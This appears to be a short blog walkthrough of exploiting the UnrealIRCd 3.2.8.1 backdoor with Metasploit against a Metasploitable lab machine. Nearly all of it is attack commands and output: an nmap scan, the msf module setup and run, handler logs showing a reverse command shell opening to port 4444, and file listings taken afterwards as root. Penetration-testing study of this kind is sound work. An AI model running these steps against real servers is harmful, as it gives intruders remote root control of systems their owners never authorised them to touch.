control – metasploit unreal_ircd_3281_backdoor

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100


eth0      Link encap:Ethernet  HWaddr 01:02:03:04:05:06
inet addr:IP-Address Bcast:Address  Mask:Mask
RX packets:33523 errors:0 dropped:0 overruns:0 frame:0
TX packets:58400 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Base address:0xd010 Memory:f0000000-f0020000

ls -l
total 388
-rw------- 1 root root   1365 Jan 20 14:08 Donation
-rw------- 1 root root  17992 Jan 20 14:08 LICENSE
drwx------ 2 root root   4096 Jan 20 14:08 aliases
--w----r-T 1 root root   1175 Jan 20 14:08
--w----r-T 1 root root   1183 Jan 20 14:08 badwords.message.conf
drwx------ 2 root root   4096 Jan 20 14:08 networks

cd networks

dir          networks.ndx                makenet


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s